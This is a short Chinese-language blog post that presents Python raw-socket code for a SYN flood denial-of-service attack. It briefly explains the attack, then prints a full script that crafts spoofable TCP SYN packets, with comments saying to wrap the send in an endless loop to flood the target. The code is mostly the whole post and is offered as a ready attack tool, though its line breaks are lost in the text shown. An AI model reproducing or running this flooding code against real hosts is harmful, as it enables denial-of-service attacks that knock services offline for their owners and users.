Python實現SYN Flood攻擊

標籤：

 0×00 背景

SYN Flood是當前最流行的DoS（拒絕服務的攻擊）與DDoS（分散式阻斷服務攻擊）的方式之一，這是一種利用TCP協議缺陷，發送大量偽造的TCP串連請求，從而使得被攻擊方資源耗盡（CPU滿負荷或記憶體不足）的攻擊方式。

0×01 Code

本文章的目是介紹使用python構造packet的方法。
使用raw socket來發送packets。 該程式只適用於Linux。windows可以嘗試調用winpcap。

‘‘‘    Syn flood program in python using raw sockets (Linux)        Silver Moon ([email protected])‘‘‘ # some importsimport socket, sysfrom struct import * # checksum functions needed for calculation checksumdef checksum(msg):    s = 0    # loop taking 2 characters at a time    for i in range(0, len(msg), 2):        w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )        s = s + w        s = (s>>16) + (s & 0xffff);    #s = s + (s >> 16);    #complement and mask to 4 byte short    s = ~s & 0xffff        return s #create a raw sockettry:    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)except socket.error , msg:    print ‘Socket could not be created. Error Code : ‘ + str(msg[0]) +‘ Message ‘ + msg[1]    sys.exit() # tell kernel not to put in headers, since we are providing its.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)    # now start constructing the packetpacket = ‘‘; source_ip = ‘192.168.1.101‘dest_ip = ‘192.168.1.1‘ # or socket.gethostbyname(‘www.google.com‘) # ip header fieldsihl = 5version = 4tos = 0tot_len = 20 + 20  # python seems to correctly fill the total length, dont know how ??id = 54321  #Id of this packetfrag_off = 0ttl = 255protocol = socket.IPPROTO_TCPcheck = 10  # python seems to correctly fill the checksumsaddr =socket.inet_aton ( source_ip )  #Spoof the source ip address if you want todaddr = socket.inet_aton ( dest_ip ) ihl_version = (version << 4) + ihl # the ! in the pack format string means network orderip_header = pack(‘!BBHHHBBH4s4s‘, ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr) # tcp header fieldssource = 1234   # source portdest = 80   # destination portseq = 0ack_seq = 0doff = 5    #4 bit field, size of tcp header, 5 * 4 = 20 bytes#tcp flagsfin = 0syn = 1rst = 0psh = 0ack = 0urg = 0window = socket.htons (5840)    #   maximum allowed window sizecheck = 0urg_ptr = 0 offset_res = (doff << 4) + 0tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) +(ack << 4) + (urg << 5) # the ! in the pack format string means network ordertcp_header = pack(‘!HHLLBBHHH‘, source, dest, seq, ack_seq, offset_res, tcp_flags,  window, check, urg_ptr) # pseudo header fieldssource_address = socket.inet_aton( source_ip )dest_address = socket.inet_aton(dest_ip)placeholder = 0protocol = socket.IPPROTO_TCPtcp_length = len(tcp_header) psh = pack(‘!4s4sBBH‘, source_address , dest_address , placeholder , protocol , tcp_length);psh = psh + tcp_header; tcp_checksum = checksum(psh) # make the tcp header again and fill the correct checksumtcp_header = pack(‘!HHLLBBHHH‘, source, dest, seq, ack_seq, offset_res, tcp_flags,  window, tcp_checksum , urg_ptr) # final full packet - syn packets dont have any datapacket = ip_header + tcp_header #Send the packet finally - the port specified has no effects.sendto(packet, (dest_ip , 0))    # put this in a loop if you want to flood the target #put the above line in a loop like while 1: if you want to flood

注意：運行時需要Root許可權。

Python實現SYN Flood攻擊